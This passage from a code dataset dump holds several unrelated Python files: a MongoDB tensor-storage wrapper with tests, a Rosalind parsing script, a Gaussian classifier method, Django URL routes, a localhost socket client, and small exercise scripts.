\n lead = self.get_node('//div[contains(@class, \"article_panel\")]//p[2]')\n\n return lead.strip() if lead else ''\n\n def get_author(self):\n return self.get_node('//*[contains(@class, \"author_name\")]//a/text()[2]').strip()\n\n def get_language(self):\n return 'pl'\n","sub_path":"mobify/sources/histmag.py","file_name":"histmag.py","file_ext":"py","file_size_in_byte":3619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"228821383","text":"#This file implements the data structures and methods of TensorLayerModify using MongoDB\r\n#It has the power to create, add and remove from MainCollection, Main Attributes Array, Attribute Notes Array,\r\n#note that there are no real arrays here; it's just a generic name for API purposes\r\nimport pymongo, datetime, itertools\r\nfrom bson.objectid import ObjectId\r\n\r\nclass TensorLayerModify:\r\n\tdef __init__(self, serverLocation='localhost', port=27017, database=None, test=False):\r\n\t\tself.test = test\r\n\t\tself.client = pymongo.MongoClient(serverLocation, port)\r\n\t\tif database is None:\r\n\t\t\tself.db = self.client['test_database']\r\n\t\t\t#Set up a brand new database. Must set mainCollection; mainAttrCollection; mainAttrNotesCollection\r\n\t\t\tif not self.createMainCollection():\r\n\t\t\t\traise AttributeError\r\n\t\t\tif not self.createMainAttrArray():\r\n\t\t\t\traise AttributeError\r\n\t\t\tif not self.createAttrNotesArray():\r\n\t\t\t\traise AttributeError\r\n\t\telse:\r\n\t\t\tself.db = self.client[database]\r\n\t\t\tself.mainCollection = self.db['mainCollection']\r\n\t\t\tself.mainAttrCollection = self.db['mainAttrCollection']\r\n\t\t\tself.mainAttrNotesCollection = self.db['mainAttrNotesCollection']\r\n\t\r\n\t#Create the Main Collection in a TensorLayer\r\n\tdef createMainCollection(self):\r\n\t\tif 'mainCollection' in self.db.collection_names():\r\n\t\t\tif not self.test:\r\n\t\t\t\treturn True\r\n\t\t\ttry:\r\n\t\t\t\tself.db.mainCollection.drop()\r\n\t\t\texcept NameError:\r\n\t\t\t\tpass\r\n\t\t\r\n\t\t#will become the mainCollection when it's properly set up\r\n\t\t#I won't call it that until it's set up to prevent the thing being considered fully created when it isn't\r\n\t\tif 'tempMainCollection' in self.db.collection_names():\r\n\t\t\tself.db.tempMainCollection.drop()\r\n\t\ttempCollection = self.db.create_collection( 'tempMainCollection', write_concern=pymongo.write_concern.WriteConcern(j=True) )#I like journals\r\n\t\t\r\n\t\theadDoc = {\r\n\t\t\t\"_id\": ObjectId(b\"headDoc00000\"),\r\n\t\t\t\"Creation DateTime\": str(datetime.datetime.utcnow()),\r\n\t\t\t\"attrArrayIndexMax\": -1\r\n\t\t}\r\n\t\t\r\n\t\ttempCollection.insert_one(headDoc)\r\n\t\t\r\n\t\ttempCollection.rename('mainCollection')\r\n\t\treturn True\r\n\t\t\r\n\t#Delete a Collection, and return True if collection doesn't exist\r\n\tdef deleteMainCollection(self):\r\n\t\tif 'mainCollection' not in self.db.collection_names():\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\tmc = self.db['mainCollection']\r\n\t\t\tmc.drop()\r\n\t\t\treturn True\r\n\t\treturn False\r\n\t\r\n\t#Add an element to the Main Collection in a TensorLayer\r\n\t#Also adds the appropriate entry to the MainAttrArray \r\n\t#tensor must be an array of values convertable to int.\r\n\tdef addToTensorLayer(self, tensor):\r\n\t\tintTensor = []\r\n\t\ttry:\r\n\t\t\tfor c in tensor:\r\n\t\t\t\tintTensor.append( int(c) )\r\n\t\texcept:\r\n\t\t\treturn False\r\n\t\t\r\n\t\t#Get the information for creating a new Document\r\n\t\tupdateStatus = self.db.mainCollection.find_one_and_update( \r\n\t\t\t{\"_id\": ObjectId(b\"headDoc00000\")}, {\"$inc\": {\"attrArrayIndexMax\": 1}}, return_document = pymongo.collection.ReturnDocument.AFTER\r\n\t\t)\r\n\t\tattrArrayIndex = updateStatus['attrArrayIndexMax']\r\n\t\t\r\n\t\t#Create the new Document\r\n\t\tdoc = {\r\n\t\t\t\"tensor\": intTensor,\r\n\t\t\t\"attributes\": attrArrayIndex, #is really just a pointer to the attrArrayIndex\r\n\t\t\t\"quickLinks\": intTensor\r\n\t\t}\r\n\t\t\r\n\t\t#create main attribute array entry\r\n\t\tif not self.addToMainAttrArray(attrArrayIndex):\r\n\t\t\treturn False\r\n\t\t\t\r\n\t\t#Append the new Document to the mainCollection\r\n\t\tself.db.mainCollection.insert_one(doc)\r\n\t\r\n\t\treturn True\r\n\t\t\r\n\t#Remove an element from the Main Collection in a TensorLayer\r\n\tdef removeFromTensorLayer(self, tensor):\r\n\t\t#Acts like delete_many but I also removeFromMainAttrArray\r\n\t\twhile True:\r\n\t\t\ttry:\r\n\t\t\t\t#remove entry. Note that no ID is known so we just kinda guess\r\n\t\t\t\tdeleteResult = self.db.mainCollection.find_one_and_delete( {\"tensor\": tensor} )\r\n\t\t\t\tif deleteResult is None:\r\n\t\t\t\t\tbreak\r\n\t\t\t\tattrArrayIndex = deleteResult['attributes']\r\n\t\t\t\t\r\n\t\t\t\t#update main attribute array. Continue unconditionally since ptrs are gone anyway\r\n\t\t\t\tself.removeFromMainAttrArray(attrArrayIndex)\r\n\t\t\texcept:\r\n\t\t\t\traise\r\n\t\t\r\n\t\treturn True\r\n\t\t\r\n\t#Create a valid Main Attributes Array ObjectId\r\n\t#These objects are not unique unless attrArrayIndex is unique. BE CAREFUL!\r\n\tdef mainAttrArrayObjectId(self, attrArrayIndex):\r\n\t\tunbuffedString = str(attrArrayIndex)\r\n\t\tbuffedString = \"A\"+unbuffedString.rjust(11, '0')\r\n\t\treturn ObjectId( buffedString.encode() )\r\n\t\t\r\n\t#Create the Main Attributes Array\r\n\tdef createMainAttrArray(self):\r\n\t\tif 'mainAttrCollection' in self.db.collection_names():\r\n\t\t\tif not self.test:\r\n\t\t\t\treturn True\r\n\t\t\ttry:\r\n\t\t\t\tself.db.mainAttrCollection.drop()\r\n\t\t\texcept NameError:\r\n\t\t\t\tpass\r\n\t\t\t\r\n\t\t#will become the mainCollection when it's properly set up\r\n\t\t#I won't call it that until it's set up to prevent the thing being considered fully created when it isn't\r\n\t\tif 'tempMainAttrCollection' in self.db.collection_names():\r\n\t\t\tself.db.tempMainAttrCollection.drop()\r\n\t\ttempCollection = self.db.create_collection( 'tempMainAttrCollection', write_concern=pymongo.write_concern.WriteConcern(j=True) )#I like journals\r\n\t\t\r\n\t\theadDoc = {\r\n\t\t\t\"_id\": ObjectId(b\"AheadDoc0000\"),\r\n\t\t\t\"Creation DateTime\": str(datetime.datetime.utcnow())\r\n\t\t}\r\n\t\t\r\n\t\ttempCollection.insert_one(headDoc)\r\n\t\t\r\n\t\ttempCollection.rename('mainAttrCollection')\r\n\t\treturn True\r\n\t\t\r\n\tdef deleteMainAttrArray(self):\r\n\t\tif 'mainAttrCollection' not in self.db.collection_names():\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\tmc = self.db['mainAttrCollection']\r\n\t\t\tmc.drop()\r\n\t\t\treturn True\r\n\t\treturn False\r\n\t\t\r\n\t#Add a row to the Main Attributes Array in a TensorLayer\r\n\tdef addToMainAttrArray(self, attrArrayIndex):\r\n\t\tif not isinstance(attrArrayIndex, int):\r\n\t\t\treturn False\r\n\t\t\r\n\t\t#Create the new Document - creating a predictable _id field\r\n\t\tdoc = {\r\n\t\t\t\"_id\": self.mainAttrArrayObjectId(attrArrayIndex)\r\n\t\t}\r\n\t\t\t\r\n\t\t#Append the new Document to the mainAttrCollection\r\n\t\tself.db.mainAttrCollection.insert_one(doc)\r\n\t\treturn True\r\n\t\t\r\n\t#Remove an element from the Main Collection in a TensorLayer\r\n\tdef removeFromMainAttrArray(self, attrArrayIndex):\r\n\t\tif not isinstance(attrArrayIndex, int):\r\n\t\t\treturn False\r\n\t\t\t\r\n\t\tself.db.mainAttrCollection.delete_one({'_id': self.mainAttrArrayObjectId(attrArrayIndex)})\r\n\t\t\t\r\n\t\treturn True\r\n\t\t\r\n\t#update an attribute at column classifierIndex or by classifierName (which finds classifierIndex)\r\n\t#Also needs what to update (attrArrayIndex)\r\n\t#If it fails part way through, returns an int w/ number of successes in the arrays (in case fails part way through long list)\r\n\tdef updateAttribute(self, attrArrayIndex, classifierIndices=[], classifierNames=[]):\r\n\t\tif (not isinstance(classifierIndices, list)) or (not isinstance(attrArrayIndex, int)) or (not isinstance(classifierNames, list)):\r\n\t\t\traise ValueError\r\n\t\ttoUpdateDict = {}\r\n\t\tfor count, (classifierIndex, classifierName) in enumerate(itertools.zip_longest(classifierIndices, classifierNames)):\r\n\t\t\tif classifierIndex < 0 and classifierName == \"\":\r\n\t\t\t\t#Incorrect input args; push whatever we've got first\r\n\t\t\t\ttry:\r\n\t\t\t\t\tself.db.mainAttrCollection.find_one_and_update(\r\n\t\t\t\t\t{'_id': (self.mainAttrArrayObjectId(attrArrayIndex)) }, {\"$set\": toUpdateDict}\r\n\t\t\t\t\t)\r\n\t\t\t\texcept pymongo.errors.OperationFailure:\r\n\t\t\t\t\tpass\r\n\t\t\t\treturn count - 1\r\n\t\t\telif classifierIndex > -1:\r\n\t\t\t\tclassification = self.runClassifier(attrArrayIndex, classifierIndex)\r\n\t\t\t\tif not isinstance(classification, int):\r\n\t\t\t\t\traise ValueError\r\n\t\t\t\ttoUpdateDict[str(classifierIndex)] = classification\r\n\t\t\telif len(classifierName) > 0:\r\n\t\t\t\tdoc = self.db.mainAttrNotesCollection.find_one({\"Name\": classifierName})\r\n\t\t\t\tif doc is None:\r\n\t\t\t\t\t#Should find a doc no matter what. Push whatever we've got first.\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\tself.db.mainAttrCollection.find_one_and_update(\r\n\t\t\t\t\t\t{'_id': (self.mainAttrArrayObjectId(attrArrayIndex)) }, {\"$set\": toUpdateDict}\r\n\t\t\t\t\t\t)\r\n\t\t\t\t\texcept pymongo.errors.OperationFailure:\r\n\t\t\t\t\t\tpass\r\n\t\t\t\t\treturn count - 1\r\n\t\t\t\tclassifierIndex = int(str(doc[\"_id\"])[:1])\r\n\t\t\t\tclassification = self.runClassifier(attrArrayIndex, classifierIndex)\r\n\t\t\t\tif not isinstance(classification, int):\r\n\t\t\t\t\traise ValueError\r\n\t\t\t\ttoUpdateDict[str(classifierIndex)] = classification\r\n\t\t\telse:\r\n\t\t\t\t#We're failing ?somehow?; push whatever we've got first\r\n\t\t\t\ttry:\r\n\t\t\t\t\tself.db.mainAttrCollection.find_one_and_update(\r\n\t\t\t\t\t{'_id': (self.mainAttrArrayObjectId(attrArrayIndex)) }, {\"$set\": toUpdateDict}\r\n\t\t\t\t\t)\r\n\t\t\t\texcept pymongo.errors.OperationFailure:\r\n\t\t\t\t\tpass\r\n\t\t\t\treturn count - 1\r\n\t\t\r\n\t\t#update all classifications for this attribute at once\r\n\t\tself.db.mainAttrCollection.find_one_and_update(\r\n\t\t{'_id': (self.mainAttrArrayObjectId(attrArrayIndex))}, {\"$set\": toUpdateDict}\r\n\t\t)\r\n\t\treturn True\r\n\t\t\r\n\tdef mainAttrNotesObjectId(self, attrArrayIndex):\r\n\t\tunbuffedString = str(attrArrayIndex)\r\n\t\tbuffedString = \"N\"+unbuffedString.rjust(11, '0')\r\n\t\treturn ObjectId( buffedString.encode() )\r\n\t\t\r\n\t#Create the Attribute Notes Array\r\n\t#Also sets up the default attribute's notes: intraAssociationList, interAssociationList, domainAttr, selfAttr, interAttr\r\n\t#For more information on why all attributes are assigned domain, self, or inter labels, look @ requirements implementation\r\n\t#If the requirements implementation has been changed, please update these comments. Thanks :) - Greg\r\n\tdef createAttrNotesArray(self):\r\n\t\tif 'mainAttrNotesCollection' in self.db.collection_names():\r\n\t\t\tif not self.test:\r\n\t\t\t\treturn True\r\n\t\t\ttry:\r\n\t\t\t\tself.db.mainAttrNotesCollection.drop()\r\n\t\t\texcept NameError:\r\n\t\t\t\tpass\r\n\t\t#will become the mainAttrNotesCollection when it's properly set up\r\n\t\t#I won't call it that until it's set up to prevent the thing being considered fully created when it isn't\r\n\t\tif 'tempMainAttrNotesCollection' in self.db.collection_names():\r\n\t\t\tself.db.tempMainAttrNotesCollection.drop()\r\n\t\ttempCollection = self.db.create_collection( 'tempMainAttrNotesCollection', write_concern=pymongo.write_concern.WriteConcern(j=True) )#I like journals\r\n\t\t\r\n\t\theadDoc = {\r\n\t\t\t\"DateTime\": str(datetime.datetime.utcnow()),\r\n\t\t\t\"_id\": ObjectId(b\"NheadDoc0000\")\r\n\t\t}\r\n\t\t\r\n\t\ttempCollection.insert_one(headDoc)\r\n\t\t\r\n\t\ttempCollection.rename('mainAttrNotesCollection')\r\n\t\treturn True\r\n\t\t\r\n\tdef deleteAttrNotesArray(self):\r\n\t\tif 'mainAttrNotesCollection' not in self.db.collection_names():\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\tmc = self.db['mainAttrNotesCollection']\r\n\t\t\tmc.drop()\r\n\t\t\treturn True\r\n\t\treturn False\r\n\t\r\n\t#Add a row to the Attribute Notes Array\r\n\tdef addToAttrNotesArray(self, classifierIndex):\r\n\t\tif not isinstance(classifierIndex, int):\r\n\t\t\treturn False\r\n\t\t\r\n\t\t#Create the new Document - currently nulled\r\n\t\tdoc = {\r\n\t\t\t\"_id\": (self.mainAttrNotesObjectId(classifierIndex))\r\n\t\t}\r\n\t\t\t\r\n\t\t#Append the new Document to the mainAttrNotesCollection\r\n\t\tself.db.mainAttrNotesCollection.insert_one(doc)\r\n\t\t\r\n\t\treturn True\r\n\t\t\r\n\t#Remove an element from the Attribute Notes Array\r\n\tdef removeFromAttrNotesArray(self, classifierIndex):\r\n\t\tif not isinstance(classifierIndex, int):\r\n\t\t\treturn False\r\n\t\t\t\r\n\t\tself.db.mainAttrNotesCollection.delete_one({'_id': (mainAttrNotesObjectId(classifierIndex)) })\r\n\t\t\t\r\n\t\treturn True\r\n\t\t\r\n\t#update an attribute at classifierIndex or by classifierName (which finds classifierIndex)\r\n\t#Must ensure that new updates, which will overwrite, are legitimate.\r\n\t#This adds information to columns of mainAttrArray\r\n\tdef updateAttributeNotes(self, dictOfUpdates, classifierIndex=-1, classifierName=\"\"):\r\n\t\ttry:\r\n\t\t\tid = self.mainAttrNotesObjectId(classifierIndex)\r\n\t\texcept:\r\n\t\t\traise ValueError\r\n\t\tif classifierIndex == -1 and classifierName == \"\":\r\n\t\t\traise ValueError\r\n\t\telif classifierIndex > -1:\r\n\t\t\tif not isinstance(dictOfUpdates, dict):\r\n\t\t\t\traise ValueError\r\n\t\t\ttry:\r\n\t\t\t\tif not self.db.mainAttrNotesCollection.find_one_and_update(\r\n\t\t\t\t{'_id': id}, {\"$set\": dictOfUpdates}, upsert=False\r\n\t\t\t\t):\r\n\t\t\t\t\traise KeyError\r\n\t\t\texcept:\r\n\t\t\t\tself.addToAttrNotesArray(classifierIndex)\r\n\t\t\t\tif not self.db.mainAttrNotesCollection.find_one_and_update(\r\n\t\t\t\t{'_id': id}, {\"$set\": dictOfUpdates}, upsert=True\r\n\t\t\t\t):\r\n\t\t\t\t\traise KeyError\r\n\t\t\treturn True\r\n\t\telif len(classifierName) > 0:\r\n\t\t\tif not isinstance(dictOfUpdates, dict):\r\n\t\t\t\traise ValueError\r\n\t\t\ttry:\r\n\t\t\t\tif not self.db.mainAttrNotesCollection.find_one_and_update(\r\n\t\t\t\t{\"Name\": classifierName}, {\"$set\": dictOfUpdates}, upsert=False\r\n\t\t\t\t):\r\n\t\t\t\t\traise KeyError\r\n\t\t\texcept KeyError:\r\n\t\t\t\traise\r\n\t\t\texcept:\r\n\t\t\t\traise ValueError\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\treturn False\r\n\t\t\t\r\n\t\treturn False\r\n\t\r\n\t#Must create a \"class Derived(TensorLayerModify)\" which will implement the callClassifier function.\r\n\t#Must return an integer. Must be called with a known good index\r\n\t#First retrieve the tensor/list we're trying to classify using attrArrayIndex\r\n\t#Then retrieve the classifier using classifierIndex\r\n\t#Then run the classifier on the tensor/list\r\n\tdef runClassifier(self, attrArrayIndex, classifierIndex):\r\n\t\t#Run a check to see if there even is such a classifier\r\n\t\tnHeadDoc = self.mainAttrNotesCollection.find_one({\"_id\": ObjectId(b\"NheadDoc0000\")})\r\n\t\tif nHeadDoc is None:\r\n\t\t\traise ValueError\r\n\t\tif classifierIndex < 0:\r\n\t\t\traise ValueError\r\n\t\t#Retrieve the tensor/lis we're trying to classify using attrArrayIndex\r\n\t\ttensorDoc = self.mainCollection.find_one( {\"attributes\": attrArrayIndex } )\r\n\t\tif tensorDoc is None:\r\n\t\t\tprint ('attrArrayIndex', attrArrayIndex)\r\n\t\t\tprint('all in mainCollection')\r\n\t\t\tfor doc in self.db.mainCollection.find({}):\r\n\t\t\t\tprint( doc )\r\n\t\t\traise ValueError\r\n\t\t#Retrieve the classifier using classifierIndex\r\n\t\tclassifierFuncDoc = self.mainAttrNotesCollection.find_one( {\"_id\": (self.mainAttrNotesObjectId(classifierIndex)) } )\r\n\t\tif classifierFuncDoc is None:\r\n\t\t\traise ValueError\r\n\t\t#Run the classifier on the tensor/list\r\n\t\treturn self.callClassifier(classifierFuncDoc['Name'], tensorDoc['tensor'])\r\n\t\t\r\n\tdef callClassifier(self, classifierFuncName, attrArray):\r\n\t\t#suggested implementation:\r\n\t\t#callableFunc = dictOfFuncs[classifierFuncName]\r\n\t\t#callableFunc(attrArray, currentStateArgsYourClassifierShouldn'tNeedUSECLASSESUnlessInCThenUDaBOMB)\r\n\t\t#Technically you can call different classifiers on different attributes. Not sure why you'd want to\r\n\t\t#Please manage the dictOfFuncs in the derived class. I don't want that shit here. Thanks! :)\r\n\t\t#PassiveAggressiveComments #Hashtag #Octothorpe :P\r\n\t\traise NotImplementedError()\r\n\t\r\n#NOTE TO USER: Must open the server before this testing will work!\r\ndef testTensorLayerModify():\r\n\ttlm = TensorLayerModify(test=True)\r\n\tprint('initialization of TensorLayerModify successful?')\r\n\ttensor = [1, 2, 3, 4, 5]\r\n\t\r\n\t#-----------------------------------------------------------------------------------------------\r\n\t#Check for adding and removing elements to the mainCollection\r\n\t#-----------------------------------------------------------------------------------------------\r\n\tif not tlm.addToTensorLayer(tensor):\r\n\t\traise ValueError\r\n\tprint(\"should find a Doc\", tlm.db.mainCollection.find({\"tensor\": tensor}) )\r\n\tprint(\"the collection:\")\r\n\tfor row in tlm.db.mainCollection.find({}):\r\n\t\tprint(row)\r\n\tif not tlm.removeFromTensorLayer(tensor):\r\n\t\traise ValueError\r\n\tprint(\"should NOT find a Doc\", tlm.db.mainCollection.find({\"tensor\": tensor}) )\r\n\tprint(\"the collection:\")\r\n\tfor row in tlm.db.mainCollection.find({}):\r\n\t\tprint(row)\r\n\t\r\n\tfor _ in range(0, 2):\r\n\t\tif not tlm.addToTensorLayer(tensor):\r\n\t\t\traise ValueError\r\n\t\r\n\tif not tlm.removeFromTensorLayer(tensor):\r\n\t\traise ValueError\r\n\tprint(\"should NOT find a Doc\", tlm.db.mainCollection.find({\"tensor\": tensor}) )\r\n\tprint(\"the collection:\")\r\n\tfor row in tlm.db.mainCollection.find({}):\r\n\t\tprint(row)\r\n\t\r\n\tfor _ in range(2):\r\n\t\tif not tlm.addToTensorLayer(tensor):\r\n\t\t\traise ValueError\r\n\t\t\r\n\tprint( 'should find 3 including headDoc' )\r\n\tfor doc in tlm.db.mainCollection.find({}):\r\n\t\tprint( doc )\r\n\t\r\n\t#Check for the existance of elements in mainAttrCollection\r\n\tprint( 'should find 3 including AheadDoc' )\r\n\tfor doc in tlm.db.mainAttrCollection.find({}):\r\n\t\tprint( doc )\r\n\t\r\n\t#Check for the existance of elements in mainAttrNotesCollection\r\n\tprint( 'should find 1 including NheadDoc because columns/Notes are not inherent to attributeArray/Rows' )\r\n\tfor doc in tlm.db.mainAttrNotesCollection.find({}):\r\n\t\tprint( doc )\r\n\t\r\n\t#-----------------------------------------------------------------------------------------------\r\n\t#this next bit requires implementing runClassifier to test updateAttribute\r\n\t#-----------------------------------------------------------------------------------------------\r\n\tprint('testing runClassifier', flush=True)\r\n\t\r\n\t#This class should open a second connection to the database... I think\r\n\tclass ClassifierMaker(TensorLayerModify):\r\n\t\t#I think this will override callClassifier in the TensorLayerModify class\r\n\t\tdef callClassifier(self, classifierFuncName, attrArray):\r\n\t\t\tif classifierFuncName == 'class0':\r\n\t\t\t\treturn 0\r\n\t\t\telif classifierFuncName == 'class1':\r\n\t\t\t\treturn 1\r\n\tclassifierMaker = ClassifierMaker(database='test_database')#test=False b/c don't want to zero database\r\n\t\r\n\t#Resuming testing\r\n\ttry:\r\n\t\tif classifierMaker.updateAttribute(0, classifierIndex=-50, classifierName=\"\"):\r\n\t\t\traise ValueError\r\n\texcept ValueError:\r\n\t\traise\r\n\texcept:\r\n\t\tpass\r\n\ttry:\r\n\t\tif classifierMaker.updateAttribute(1):#1 is attrArrayIndex\r\n\t\t\traise ValueError\r\n\texcept ValueError:\r\n\t\traise\r\n\texcept:\r\n\t\tpass\r\n\t\t\r\n\t#-----------------------------------------------------------------------------------------------\r\n\t#Now creating two classifiers by updating attrNotesArray via updateAttributeNotes\r\n\t#-----------------------------------------------------------------------------------------------\r\n\tdictOfUpdates = {'Name': 'class0', 'trivial': 1, 'category': 'self'}#Name; trivial T/F; category: domain, intrarelationship, self;\r\n\tif classifierMaker.updateAttributeNotes(dictOfUpdates, classifierIndex=0):\r\n\t\tprint('classfierNotes @ classifierIndex=0 is set up according to my code')\r\n\tclassifierMaker.updateAttributeNotes({'Name': 'class1'}, classifierIndex=1)\r\n\tdictOfUpdates2 = {'trivial': 1, 'category': 'self'}\r\n\tif classifierMaker.updateAttributeNotes(dictOfUpdates2, classifierName='class1'):\r\n\t\tprint('classfierNotes @ classifierIndex=1 is set up according to my code')\r\n\t\t\r\n\tprint('See Classifier Notes in attrNotesArray collection')\r\n\tfor row in classifierMaker.db.mainAttrNotesCollection.find({}):\r\n\t\tprint(row)\r\n\t\t\r\n\t#what if no such classifier exists and so an exception is raised in the derived class?\r\n\t#Then fail out\r\n\ttry:\r\n\t\tif classifierMaker.updateAttribute(classifierIndex=5):\r\n\t\t\traise ValueError\r\n\texcept ValueError:#nobody should succeed here!\r\n\t\traise\r\n\texcept:\r\n\t\tpass\r\n\t\t\r\n\t#Normal Operation\r\n\ttry:\r\n\t\tif not classifierMaker.updateAttribute(3, classifierIndices=[0]):\r\n\t\t\traise ValueError\r\n\texcept ValueError:#shouldn't fail here!\r\n\t\traise\r\n\texcept:\r\n\t\traise\r\n\tprint('should now be able to see classified information in mainAttrArray')\r\n\tprint('collection:')\r\n\tfor row in tlm.db.mainAttrCollection.find({}):\r\n\t\tprint(row)\r\n\t\r\n\t#Normal Operation\r\n\ttry:\r\n\t\tif not classifierMaker.updateAttribute(4, classifierIndices=[0, 1]):\r\n\t\t\traise ValueError\r\n\texcept ValueError:#shouldn't fail here!\r\n\t\traise\r\n\texcept:\r\n\t\traise\r\n\tprint('should now be able to see classified information in mainAttrArray')\r\n\tprint('collection:')\r\n\tfor row in tlm.db.mainAttrCollection.find({}):\r\n\t\tprint(row)\r\n\t\r\n\t#-----------------------------------------------------------------------------------------------\r\n\t#Check up on the final status!!!\r\n\t#-----------------------------------------------------------------------------------------------\r\n\t#Look at the mainCollection\r\n\tprint( 'headDoc and other members' )\r\n\tfor doc in tlm.db.mainCollection.find({}):\r\n\t\tprint( doc )\r\n\t\r\n\t#Check for the existance of elements in mainAttrCollection\r\n\tprint( 'AheadDoc and other members' )\r\n\tfor doc in tlm.db.mainAttrCollection.find({}):\r\n\t\tprint( doc )\r\n\t\r\n\t#Check for the existance of elements in mainAttrNotesCollection\r\n\tprint( 'NheadDoc and other members' )\r\n\tfor doc in tlm.db.mainAttrNotesCollection.find({}):\r\n\t\tprint( doc )\r\n\t\r\n\treturn True\r\n\r\n#NOTE TO USER: Must open the server before this testing will work!\r\nif __name__ == '__main__':\r\n\tprint ('testing TensorLayerModify')\r\n\tif testTensorLayerModify():\r\n\t\tprint ('TensorLayerModify verified')\r\n'''\r\nNotes:\r\nIf this class is ever converted to a compiled language, try to eliminate/check for unbounded memory allocation.\r\n'''","sub_path":"Database Interface/TensorLayerModify.py","file_name":"TensorLayerModify.py","file_ext":"py","file_size_in_byte":20295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"202496984","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 18 15:00:40 2018\n\n@author: 317_lab_B04\n\"\"\"\nimport re\n# open file\n\n# input\n#file = open(\"rosalind_splc.txt\")\nfile = open(\"input.txt\")\n\n# table\nfile_table = open(\"table.txt\")\n\n# declare varies\ntext = file.read()\ntext_table = file_table.read()\n\ndict_RAN_protein_table = {}\n\n# check target file text\nprint(\"target text : \\n\"+text)\nprint(\"table text : \\n\"+text_table)\n\n#split table by ' ' and ',' and put it into dictinary\nfor target in text_table.split():\n target_item = target.split(\",\")\n dict_RAN_protein_table[target_item[0]] = target_item[1]\ndel target, target_item, text_table\n\n#ListDNA = [temp2 for temp2 in text.split(\">\",\"\\n\")]\nListDNA = re.findall(\">\\w*\\s*([\\w\\n]*)\", text)\nListDNA = [temp.replace(\"\\n\", \"\") for temp in ListDNA]\n# write the result in output text file\nopen(\"output.txt\", 'w').close()\nopen(\"output.txt\", 'a').write(\"\")\n\n# close the text file which has already opened since the program ran\nfile.close()","sub_path":"exercise_24_Open_Reading_Frames/exercise_24.py","file_name":"exercise_24.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"479891446","text":"from abc import abstractmethod\n\nfrom Math.DiscreteDistribution import DiscreteDistribution\n\nfrom Classification.Instance.CompositeInstance import CompositeInstance\nfrom Classification.Instance.Instance import Instance\nfrom Classification.Model.ValidatedModel import ValidatedModel\n\n\nclass GaussianModel(ValidatedModel):\n\n priorDistribution: DiscreteDistribution\n\n @abstractmethod\n def calculateMetric(self, instance: Instance, Ci: str) -> float:\n pass\n\n def predict(self, instance: Instance) -> str:\n \"\"\"\n The predict method takes an Instance as an input. First it gets the size of prior distribution and loops this\n size times. Then it gets the possible class labels and and calculates metric value. At the end, it returns the\n class which has the maximum value of metric.\n\n PARAMETERS\n ----------\n instance : Instance\n Instance to predict.\n\n RETURNS\n -------\n str\n The class which has the maximum value of metric.\n \"\"\"\n maxMetric = -10000000\n if isinstance(instance, CompositeInstance):\n predicatedClass = instance.getPossibleClassLabels()[0]\n size = len(instance.getPossibleClassLabels())\n else:\n predicatedClass = self.priorDistribution.getMaxItem()\n size = len(self.priorDistribution)\n for i in range(size):\n if isinstance(instance, CompositeInstance):\n Ci = instance.getPossibleClassLabels()[i]\n else:\n Ci = self.priorDistribution.getItem(i)\n if self.priorDistribution.containsItem(Ci):\n metric = self.calculateMetric(instance, Ci)\n if metric > maxMetric:\n maxMetric = metric\n predicatedClass = Ci\n return predicatedClass","sub_path":"Classification/Model/GaussianModel.py","file_name":"GaussianModel.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"268374059","text":"from django.urls import path\nfrom . import views\napp_name = \"app\"\nurlpatterns = [\n path('create/',views.create, name = 'create'),\n path('data/',views.data, name = 'data'),\n path('recipe_list/',views.recipe_list, name = 'recipe_list'),\n path('/details/',views.details, name = 'details'),\n path('/delete/',views.delete, name = 'delete'),\n]","sub_path":"mysite/app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"421682276","text":"#!/usr/bin/env /Users/alrolla/anaconda/bin/python\n\nfrom socket import *\nimport sys\nfrom argparse import ArgumentParser\n\n\ndef main():\n\n parser = ArgumentParser()\n required_named = parser.add_argument_group('required named arguments')\n required_named.add_argument(\"-w\", \"--wordlist\",\n dest=\"words\",\n required=True,\n help=\"Word List{ W1, ..., Wn }\",\n metavar=\"WORD_LIST\")\n\n args = parser.parse_args()\n\n soc = socket(AF_INET, SOCK_STREAM)\n host = \"127.0.0.1\"\n port = 9999\n\n try:\n soc.connect((host, port))\n except:\n print(\"Connection error to DB service ..\")\n sys.exit()\n\n soc.sendall(args.words.strip().encode())\n\n receive = soc.recv(10000).decode()\n\n print(receive)\n soc.close()\n \n # print(\"Enter 'quit' to exit\")\n # message = input(\" -> \")\n #\n # while message != 'quit':\n # # Send the word to the service\n # soc.sendall(message.strip().encode())\n # # Receive the result ( json )\n # receive = soc.recv(10000).decode()\n # print(receive)\n # message = input(\" -> \")\n #\n # soc.send(b'--quit--')\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"web/PHP/Cliente.py","file_name":"Cliente.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"92059941","text":"\"\"\"\nOur first Python test program.\nTeam members: August Wadlington, Bruce Tang, Danny Little\n\"\"\"\nfrom random import randint\n\n\ndef main():\n my_cool_variable = ''\n target = 'Hello world!'\n i = 0\n misfires = 0\n while my_cool_variable != 'Hello world!':\n r = randint(32, 128)\n to_add = chr(r)\n if to_add == target[i]:\n my_cool_variable += to_add\n i += 1\n elif to_add != target[i]:\n misfires += 1\n print(my_cool_variable)\n print(\"Misses: \", misfires)\n if misfires == 0:\n print(\"Are you cheating?\")\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"hello_world.py","file_name":"hello_world.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"65323680","text":"speed_limit = 50\nmph_list = []\nkph_list = []\nspeeders = 0\nheavy_vehicles = 